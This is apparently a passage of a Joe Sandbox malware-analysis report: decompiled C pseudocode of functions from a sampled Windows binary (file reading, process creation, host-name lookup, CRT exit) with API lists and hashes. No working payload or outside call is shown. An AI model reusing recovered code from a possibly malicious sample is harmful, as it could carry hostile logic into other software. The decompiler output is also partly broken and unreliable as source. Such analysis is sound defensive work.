                          				if(_t89 >=  *((intOrPtr*)(_t74 + 0xc))) {
                          					_t93 = 0;
                          					__eflags = 0;
                          					goto L8;
                          				} else {
                          					_t93 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 8)) + _t89 * 4));
                          					if(_t93 != 0) {
                          						L19:
                          						E0131780E( &_v28);
                          						 *[fs:0x0] = _v16;
                          						_pop(_t94);
                          						return E0132EA79(_v20 ^ _t95, _t94);
                          					}
                          					L8:
                          					if( *((char*)(_t74 + 0x14)) == 0) {
                          						L11:
                          						if(_t93 != 0) {
                          							goto L19;
                          						}
                          						L12:
                          						if(_t71 == 0) {
                          							_t93 = E0132EA8A(_t93, __eflags, 0x10);
                          							_t98 = _t97 + 4;
                          							_v32 = _t93;
                          							_v8 = 1;
                          							_t54 = E012F9900(_v36,  &_v60);
                          							_v8 = 2;
                          							__eflags =  *((intOrPtr*)(_t54 + 0x14)) - 0x10;
                          							_v24 = 1;
                          							if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
                          								_t54 =  *_t54;
                          							}
                          							E012F96C0(_t54);
                          							 *((intOrPtr*)(_t93 + 4)) = 0;
                          							 *_t93 = 0x1376650;
                          							 *((intOrPtr*)(_t93 + 8)) = E01317D7A(_t86, __eflags, _t110);
                          							 *((intOrPtr*)(_t93 + 0xc)) = _t86;
                          							E012F9770( &_v112);
                          							_v8 = 0;
                          							_t58 = _v40;
                          							__eflags = _t58 - 0x10;
                          							if(__eflags >= 0) {
                          								_t61 = _t58 + 1;
                          								__eflags = _t61;
                          								_push(_t61);
                          								E012F56A0(_t71, _t89, _v60);
                          								_t98 = _t98 + 8;
                          							}
                          							_v44 = 0;
                          							_v40 = 0xf;
                          							_v60 = 0;
                          							_v32 = _t93;
                          							_v8 = 4;
                          							E0131792B(__eflags, _t93);
                          							 *((intOrPtr*)( *_t93 + 4))();
                          							 *0x13ab7fc = _t93;
                          						} else {
                          							_t93 = _t71;
                          						}
                          						goto L19;
                          					}
                          					_t63 = E01317957();
                          					if(_t89 >=  *((intOrPtr*)(_t63 + 0xc))) {
                          						goto L12;
                          					}
                          					_t93 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) + _t89 * 4));
                          					goto L11;
                          				}
                          			}


                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 012FC9DD
                          • std::_Lockit::_Lockit.LIBCPMT ref: 012FC9FD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 012FCA1D
                          • __Getcoll.LIBCPMT ref: 012FCAB3
                          • std::_Facet_Register.LIBCPMT ref: 012FCAFC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 012FCB14
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                          • String ID:
                          • API String ID: 1184649410-0
                          • Opcode ID: e82fa3ca994f79f828378f602f3c41e5aca05bb75810e652a40c9e965b04b128
                          • Instruction ID: 07c39da4e2d39751b4a6869b960dc444aaf2d1f66fde212b39e69d604c0dd3ed
                          • Opcode Fuzzy Hash: e82fa3ca994f79f828378f602f3c41e5aca05bb75810e652a40c9e965b04b128
                          • Instruction Fuzzy Hash: 6341CC7190021A8FDB25EF98D440BAEFBF8EF14714F14406DD606AB385D771AA48CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E01309210(void* __ebx, void* __ecx, void* __edi, WCHAR* _a4) {
                          				signed int _v8;
                          				void* _v20;
                          				void* _v28;
                          				long _v32;
                          				union _LARGE_INTEGER* _v40;
                          				long _v44;
                          				void* __esi;
                          				signed int _t24;
                          				WCHAR* _t26;
                          				signed char _t43;
                          				void* _t57;
                          				void* _t59;
                          				void* _t60;
                          				signed int _t61;
                          
                          				_t63 = (_t61 & 0xfffffff8) - 0x2c;
                          				_t24 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t24 ^ (_t61 & 0xfffffff8) - 0x0000002c;
                          				_t26 = _a4;
                          				_t43 = 0;
                          				_t59 = __ecx;
                          				if(_t26[8] == 0) {
                          					L16:
                          					_pop(_t60);
                          					return E0132EA79(_v8 ^ _t63, _t60);
                          				} else {
                          					if(_t26[0xa] >= 8) {
                          						_t26 =  *_t26;
                          					}
                          					_t57 = CreateFileW(_t26, 0x80000000, 0, 0, 3, 0x80, 0);
                          					if(_t57 == 0xffffffff) {
                          						goto L16;
                          					}
                          					asm("xorps xmm0, xmm0");
                          					asm("movq [esp+0x10], xmm0");
                          					_push(2);
                          					asm("adc eax, 0xffffffff");
                          					asm("movq [esp+0x28], xmm0");
                          					asm("movups [esi+0x38], xmm0");
                          					asm("movups [esi+0x48], xmm0");
                          					if(SetFilePointerEx(_t57, _v44 + 0xffffffe8, _v40,  &_v28) != 0) {
                          						_v32 = 0;
                          						if(ReadFile(_t57, _t59 + 0x38, 0x18,  &_v32, 0) != 0) {
                          							if(_v32 != 0x18 ||  *((intOrPtr*)(_t59 + 0x48)) != 0x1030307 ||  *((intOrPtr*)(_t59 + 0x40)) != 0x200) {
                          								asm("xorps xmm0, xmm0");
                          								asm("movq [esp+0x10], xmm0");
                          								_push(2);
                          								asm("adc eax, 0xffffffff");
                          								asm("movq [esp+0x30], xmm0");
                          								asm("movups [esi+0x38], xmm0");
                          								asm("movups [esi+0x48], xmm0");
                          								if(SetFilePointerEx(_t57, _v44 + 0xffffffe0, _v40,  &_v20) != 0) {
                          									_v44 = 0;
                          									if(ReadFile(_t57, _t59 + 0x38, 0x18,  &_v44, 0) != 0 && _v44 == 0x18 &&  *((intOrPtr*)(_t59 + 0x48)) == 0x1030307) {
                          										_t43 =  ==  ? 1 : _t43 & 0x000000ff;
                          									}
                          								}
                          							} else {
                          								_t43 = 1;
                          							}
                          						}
                          					}
                          					CloseHandle(_t57);
                          					goto L16;
                          				}
                          			}


                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000010,00000000,?,?,?,?,?,?,01308C29), ref: 01309253
                          • SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 01309293
                          • ReadFile.KERNEL32(00000000,?,00000018,?), ref: 013092B7
                          • SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002), ref: 01309311
                          • ReadFile.KERNEL32(00000000,?,00000018,?,00000000), ref: 01309331
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 0130935E
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandle
                          • String ID:
                          • API String ID: 683849867-0
                          • Opcode ID: 3e14e5556c2cfcf62c1467144ae7094786fb38b3924319a26387c22e4bd6386f
                          • Instruction ID: 0f51b9a010004a538a7dc4915d419f2fb3c3d4a273611ac71a5288c10a9bfb4f
                          • Opcode Fuzzy Hash: 3e14e5556c2cfcf62c1467144ae7094786fb38b3924319a26387c22e4bd6386f
                          • Instruction Fuzzy Hash: AA41AE30A043049BE631CF28CC84B67B3ECBB8A728F145B1DF5A5965D1D770E588CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E01314930(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, short* _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				void* __edi;
                          				short _t76;
                          				signed int _t77;
                          				void* _t84;
                          				intOrPtr _t87;
                          				signed int _t89;
                          				signed int _t90;
                          				intOrPtr _t110;
                          				intOrPtr _t111;
                          				signed int _t115;
                          				unsigned int _t120;
                          				intOrPtr _t125;
                          				unsigned int _t137;
                          				short* _t141;
                          				intOrPtr* _t148;
                          				unsigned int _t149;
                          				signed int _t155;
                          				signed int _t156;
                          				signed int _t158;
                          				intOrPtr _t159;
                          				signed int _t160;
                          				void* _t166;
                          				void* _t167;
                          				void* _t168;
                          
                          				_t167 = _t166 - 0xc;
                          				_push(__ebx);
                          				_t148 = __ecx;
                          				_t110 =  *__ecx;
                          				_t115 =  *((intOrPtr*)(__ecx + 4)) - _t110;
                          				_v8 = (0x66666667 * (_a4 - _t110) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * (_a4 - _t110) >> 0x20 >> 4);
                          				_t137 = 0x66666667 * _t115 >> 0x20 >> 4;
                          				_t155 = (_t137 >> 0x1f) + _t137;
                          				if(_t155 == 0x6666666) {
                          					L10:
                          					_t76 = E012F56E0(_t110, _t115, _t137, _t148, __eflags);
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					_push(_t155);
                          					_push(_t148);
                          					_t149 = _t137;
                          					_t156 = _t115;
                          					__eflags = _t156 - _t149;
                          					if(_t156 != _t149) {
                          						asm("o16 nop [eax+eax]");
                          						do {
                          							_t77 =  *(_t156 + 0x14);
                          							__eflags = _t77 - 8;
                          							if(_t77 >= 8) {
                          								_push(2 + _t77 * 2);
                          								E012F56A0(_t110, _t149,  *_t156);
                          								_t167 = _t167 + 8;
                          							}
                          							_t76 = 0;
                          							 *((intOrPtr*)(_t156 + 0x10)) = 0;
                          							 *(_t156 + 0x14) = 7;
                          							 *_t156 = 0;
                          							_t156 = _t156 + 0x28;
                          							__eflags = _t156 - _t149;
                          						} while (_t156 != _t149);
                          					}
                          					return _t76;
                          				} else {
                          					_t155 = _t155 + 1;
                          					_v12 = _t155;
                          					_t120 = (0x66666667 * ( *((intOrPtr*)(__ecx + 8)) - _t110) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(__ecx + 8)) - _t110) >> 0x20 >> 4);
                          					_t137 = _t120 >> 1;
                          					if(_t120 <= 0x6666666 - _t137) {
                          						_t84 = _t137 + _t120;
                          						__eflags = _t84 - _t155;
                          						_t115 =  >=  ? _t84 : _t155;
                          						__eflags = _t115 - 0x6666666;
                          						if(_t115 <= 0x6666666) {
                          							goto L3;
                          						} else {
                          							E012F4A60();
                          							goto L10;
                          						}
                          					} else {
                          						_t115 = 0x6666666;
                          						L3:
                          						_v16 = _t115 + _t115 * 4 << 3;
                          						_t87 = E012F57D0(_t110, _t137, _t148, _t115 + _t115 * 4 << 3);
                          						_t141 = _a8;
                          						_t111 = _t87;
                          						_t168 = _t167 + 4;
                          						_t89 = _v8 + _v8 * 4;
                          						 *((intOrPtr*)(_t111 + 0x10 + _t89 * 8)) = 0;
                          						_t90 = _t111 + _t89 * 8;
                          						 *((intOrPtr*)(_t90 + 0x14)) = 0;
                          						asm("movups xmm0, [edx]");
                          						_v8 = _t90;
                          						_t158 = _v8;
                          						asm("movups [eax], xmm0");
                          						asm("movq xmm0, [edx+0x10]");
                          						asm("movq [eax+0x10], xmm0");
                          						 *_t141 = 0;
                          						 *((intOrPtr*)(_t141 + 0x10)) = 0;
                          						 *(_t141 + 0x14) = 7;
                          						 *((intOrPtr*)(_t158 + 0x18)) =  *((intOrPtr*)(_t141 + 0x18));
                          						 *((intOrPtr*)(_t158 + 0x1c)) =  *((intOrPtr*)(_t141 + 0x1c));
                          						_t159 = _a4;
                          						 *((intOrPtr*)(_t158 + 0x20)) =  *((intOrPtr*)(_t141 + 0x20));
                          						_t124 =  *_t148;
                          						_t142 =  *((intOrPtr*)(_t148 + 4));
                          						_push( *_t148);
                          						_push(_t111);
                          						if(_t159 !=  *((intOrPtr*)(_t148 + 4))) {
                          							E01314DF0(_t124, _t159, _t148);
                          							_t168 = _t168 + 4;
                          							_t142 =  *((intOrPtr*)(_t148 + 4));
                          							_t124 = _t159;
                          							_push(_v8 + 0x28);
                          						}
                          						E01314DF0(_t124, _t142, _t148);
                          						_t125 =  *_t148;
                          						_t160 = _v12;
                          						if(_t125 != 0) {
                          							_push(_t125);
                          							L11();
                          							_push((0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4) + ((0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4 >> 0x1f) + (0x66666667 * ( *((intOrPtr*)(_t148 + 8)) -  *_t148) >> 0x20 >> 4)) * 4 << 3);
                          							E012F56A0(_t111, _t148,  *_t148);
                          							_t160 = _v12;
                          						}
                          						 *_t148 = _t111;
                          						 *((intOrPtr*)(_t148 + 4)) = _t111 + (_t160 + _t160 * 4) * 8;
                          						 *((intOrPtr*)(_t148 + 8)) = _v16 + _t111;
                          						return _v8;
                          					}
                          				}
                          			}

                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 01314AB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID: gfff$gfff$gfff$gfff
                          • API String ID: 118556049-2178600047
                          • Opcode ID: 660a7f08c6d6a054ff87ef6ff565c5be5ce7da7db38893549e87f5495dd229ed
                          • Instruction ID: 2b9f32df7e43e4de36547ce154d06009a52a786f2a98089a16a4819eb52d5e97
                          • Opcode Fuzzy Hash: 660a7f08c6d6a054ff87ef6ff565c5be5ce7da7db38893549e87f5495dd229ed
                          • Instruction Fuzzy Hash: B7418CB1A001069FDB0CDF6EE990969FBA5FF88304B158269D81ADB345D730FA55CBC2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			E012FB1E0(WCHAR* _a4) {
                          				signed int _v12;
                          				struct _STARTUPINFOW _v88;
                          				struct _PROCESS_INFORMATION _v104;
                          				signed int _t11;
                          				WCHAR* _t13;
                          				void* _t23;
                          				signed int _t24;
                          
                          				_t11 =  *0x13a4018; // 0x39cca9f6
                          				_v12 = _t11 ^ _t24;
                          				_t13 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				asm("movlpd [ebp-0x50], xmm0");
                          				asm("movlpd [ebp-0x48], xmm0");
                          				asm("movlpd [ebp-0x40], xmm0");
                          				asm("movlpd [ebp-0x38], xmm0");
                          				asm("movlpd [ebp-0x30], xmm0");
                          				asm("movlpd [ebp-0x28], xmm0");
                          				asm("movlpd [ebp-0x20], xmm0");
                          				asm("movlpd [ebp-0x18], xmm0");
                          				asm("movups [ebp-0x64], xmm0");
                          				_v88.cb = 0x44;
                          				if(_t13[0xa] >= 8) {
                          					_t13 =  *_t13;
                          				}
                          				if(CreateProcessW(0, _t13, 0, 0, 1, 0x8000000, 0, 0,  &_v88,  &_v104) != 0) {
                          					WaitForSingleObject(_v104.hThread, 0xffffffff);
                          					CloseHandle(_v104);
                          					CloseHandle(_v104.hThread);
                          				}
                          				return E0132EA79(_v12 ^ _t24, _t23);
                          			}

                          APIs
                          • CreateProcessW.KERNEL32 ref: 012FB24B
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 012FB25A
                          • CloseHandle.KERNEL32(?), ref: 012FB263
                          • CloseHandle.KERNEL32(?), ref: 012FB26C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CloseHandle$CreateObjectProcessSingleWait
                          • String ID: D
                          • API String ID: 2059082233-2746444292
                          • Opcode ID: 7446030830ccddc24d851f7d64104d035b876b95ae40f27ac261dbebb4bcee91
                          • Instruction ID: 91f55a78134b9cfb65ef15e922d9cdfe8d7db7ca2d1523929cdd3c3645a0acbe
                          • Opcode Fuzzy Hash: 7446030830ccddc24d851f7d64104d035b876b95ae40f27ac261dbebb4bcee91
                          • Instruction Fuzzy Hash: 07115B32D2034DABDB20DFD4CD45BADBBB5FBA9304F205319F6056A098DBB06994CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 25%
                          			E01352C5B(void* __ecx, intOrPtr _a4) {
                          				signed int _v8;
                          				_Unknown_base(*)()* _t8;
                          				_Unknown_base(*)()* _t14;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t8 =  &_v8;
                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                          				if(_t8 != 0) {
                          					_t8 = GetProcAddress(_v8, "CorExitProcess");
                          					_t14 = _t8;
                          					if(_t14 != 0) {
                          						 *0x1374358(_a4);
                          						_t8 =  *_t14();
                          					}
                          				}
                          				if(_v8 != 0) {
                          					return FreeLibrary(_v8);
                          				}
                          				return _t8;
                          			}

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01352C50,?,?,01352C18,?,?,?), ref: 01352C70
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01352C83
                          • FreeLibrary.KERNEL32(00000000,?,?,01352C50,?,?,01352C18,?,?,?), ref: 01352CA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: f28e0b95885fee7ff966029604368f2d2b58ee3708218448e67281da950e3fb9
                          • Instruction ID: 1cdfeda38959c29794ada6915ce9d985fe0283e9300990c4258f6e48ee9ccde4
                          • Opcode Fuzzy Hash: f28e0b95885fee7ff966029604368f2d2b58ee3708218448e67281da950e3fb9
                          • Instruction Fuzzy Hash: 57F01C31A40219FBEB31AB96E909F9EBF78EB04B59F150064E905A2251CB74AA11DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E012F6FE0(void* __ebx, void* __edi, intOrPtr* _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				char _v280;
                          				char _v284;
                          				char _v288;
                          				char _v292;
                          				signed int _v296;
                          				char _v300;
                          				short _v316;
                          				char _v716;
                          				intOrPtr* _v720;
                          				intOrPtr* _v724;
                          				intOrPtr _v728;
                          				intOrPtr _v732;
                          				char _v736;
                          				char _v752;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t64;
                          				signed int _t65;
                          				char* _t69;
                          				char* _t76;
                          				intOrPtr* _t79;
                          				intOrPtr _t86;
                          				signed int _t87;
                          				intOrPtr _t92;
                          				void* _t96;
                          				intOrPtr _t105;
                          				intOrPtr* _t115;
                          				void* _t116;
                          				intOrPtr* _t117;
                          				void* _t118;
                          				short _t119;
                          				signed int _t120;
                          				void* _t121;
                          				void* _t123;
                          				void* _t124;
                          
                          				_t113 = __edi;
                          				_t96 = __ebx;
                          				_t64 =  *0x13a4018; // 0x39cca9f6
                          				_t65 = _t64 ^ _t120;
                          				_v20 = _t65;
                          				 *[fs:0x0] =  &_v16;
                          				_t117 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				asm("movq [ebp-0x120], xmm0");
                          				_v284 = 0;
                          				_v720 = _t117;
                          				_v724 = _t117;
                          				_v292 = 0;
                          				_v288 = 0;
                          				_v284 = 0;
                          				_v8 = 0;
                          				E013478D0(__edi,  &_v716, 0, 0x190);
                          				_t123 = _t121 - 0x2e0 + 0xc;
                          				_t69 =  &_v716;
                          				__imp__#115(0x202, _t69, _t65, __edi, _t116,  *[fs:0x0], 0x1365676, 0xffffffff);
                          				if(_t69 != 0) {
                          					L21:
                          					 *_t117 = _v292;
                          					 *((intOrPtr*)(_t117 + 4)) = _v288;
                          					 *((intOrPtr*)(_t117 + 8)) = _v284;
                          					 *[fs:0x0] = _v16;
                          					_pop(_t118);
                          					return E0132EA79(_v20 ^ _t120, _t118);
                          				}
                          				E013478D0(_t113,  &_v280, _t69, 0x104);
                          				_t124 = _t123 + 0xc;
                          				if(gethostname( &_v280, 0x104) == 0xffffffff) {
                          					L20:
                          					__imp__#116();
                          					goto L21;
                          				}
                          				_t76 =  &_v280;
                          				__imp__#52(_t76);
                          				_v724 = _t76;
                          				if(_t76 == 0) {
                          					goto L20;
                          				}
                          				_t115 =  *((intOrPtr*)(_t76 + 0xc));
                          				_t119 = 0;
                          				if( *((short*)(_t76 + 0xa)) - 1 <= 0) {
                          					L19:
                          					_t117 = _v720;
                          					goto L20;
                          				} else {
                          					goto L4;
                          				}
                          				while(1) {
                          					L4:
                          					_t79 =  *_t115;
                          					if(_t79 == 0) {
                          						goto L19;
                          					}
                          					_t115 = _t115 + 4;
                          					__imp__#12( *_t79);
                          					_t111 = _t79;
                          					if(_t79 == 0) {
                          						L18:
                          						_t119 = _t119 + 1;
                          						if(_t119 <  *((short*)(_v724 + 0xa)) - 1) {
                          							continue;
                          						}
                          						goto L19;
                          					}
                          					_t19 = _t79 + 1; // 0x1
                          					_v736 = 0;
                          					_v732 = 0xf;
                          					_v752 = 0;
                          					_v728 = _t19;
                          					do {
                          						_t105 =  *_t79;
                          						_t79 = _t79 + 1;
                          					} while (_t105 != 0);
                          					_push(_t79 - _v728);
                          					E012F7F00(_t96,  &_v752, _t111, _t115, _t111);
                          					_v8 = 1;
                          					E012F6730(_t96,  &_v316,  &_v752, _t115);
                          					_v8 = 3;
                          					_t86 = _v732;
                          					if(_t86 >= 0x10) {
                          						_push(_t86 + 1);
                          						E012F56A0(_t96, _t115, _v752);
                          						_t124 = _t124 + 8;
                          					}
                          					_v736 = 0;
                          					_v732 = 0xf;
                          					_v752 = 0;
                          					if(_v300 == 0 || E012F72A0(_t96, _t115,  &_v316,  &_v316) == 0) {
                          						L15:
                          						_t87 = _v296;
                          						goto L16;
                          					} else {
                          						_t92 = _v288;
                          						if(_t92 == _v284) {
                          							_push( &_v316);
                          							E012F54C0(_t96,  &_v292, _t115, _t119, _t92);
                          							goto L15;
                          						}
                          						 *((intOrPtr*)(_t92 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t92 + 0x14)) = 0;
                          						asm("movups xmm0, [ebp-0x138]");
                          						asm("movups [eax], xmm0");
                          						asm("movq xmm0, [ebp-0x128]");
                          						asm("movq [eax+0x10], xmm0");
                          						_t87 = 7;
                          						_v288 = _v288 + 0x18;
                          						_v300 = 0;
                          						_v296 = 7;
                          						_v316 = 0;
                          						L16:
                          						_v8 = 0;
                          						if(_t87 >= 8) {
                          							_push(2 + _t87 * 2);
                          							E012F56A0(_t96, _t115, _v316);
                          							_t124 = _t124 + 8;
                          						}
                          						goto L18;
                          					}
                          				}
                          				goto L19;
                          			}










































                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                          • String ID:
                          • API String ID: 348263315-0
                          • Opcode ID: bca45d4920b9c6df722f894ff1f2aadfff8bc9c992b2a9b227f5cbf8fb5df112
                          • Instruction ID: 8ea3119354f403914351dabdb905fb39968274b2500b2a3d97e37cffacc9f33f
                          • Opcode Fuzzy Hash: bca45d4920b9c6df722f894ff1f2aadfff8bc9c992b2a9b227f5cbf8fb5df112
                          • Instruction Fuzzy Hash: A7715D71C102298BEB24DF54DC48BEDFBB8EF18314F1041E9E608A7291EB749A84CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0131D48D(void* __ecx, intOrPtr _a8) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t17;
                          				intOrPtr _t19;
                          				char* _t21;
                          				short _t28;
                          				void* _t29;
                          				void* _t31;
                          				intOrPtr _t32;
                          
                          				_t32 = _a8;
                          				_t31 = __ecx;
                          				_t29 = __ecx + 0x2c;
                          				if( *((char*)(__ecx + 0x28)) == 0) {
                          					_t5 = _t32 + 0x10; // 0x1c4689c0
                          					_t17 =  *_t5;
                          				} else {
                          					_t4 = _t32 + 0xc; // 0xbe0f2947
                          					_t17 =  *_t4;
                          				}
                          				 *((intOrPtr*)(_t31 + 0x10)) = E0131D6EF(_t29, _t31, _t32, _t17, 0, _t29);
                          				_t19 = 0x13836c2;
                          				if( *((char*)(_t32 + 0x2e)) <= 4) {
                          					_t8 = _t32 + 0x20; // 0x47be0f00
                          					_t19 =  *_t8;
                          				}
                          				 *((intOrPtr*)(_t31 + 0x14)) = E0131D6EF(_t29, _t31, _t32, _t19, 0, _t29);
                          				_t21 = "-";
                          				if( *((char*)(_t32 + 0x2f)) <= 4) {
                          					_t11 = _t32 + 0x24; // 0x205e8d2e
                          					_t21 =  *_t11;
                          				}
                          				 *((intOrPtr*)(_t31 + 0x18)) = E0131D6EF(_t29, _t31, _t32, _t21, 0, _t29);
                          				_t13 = _t32 + 0x14; // 0x578c085
                          				 *((short*)(_t31 + 0xc)) = E0131D6BE( *( *_t13) & 0x000000ff, 0, _t29);
                          				_t15 = _t32 + 0x18; // 0x7c7ff883
                          				_t28 = E0131D6BE( *( *_t15) & 0x000000ff, 0, _t29);
                          				 *((short*)(_t31 + 0xe)) = _t28;
                          				return _t28;
                          			}














                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
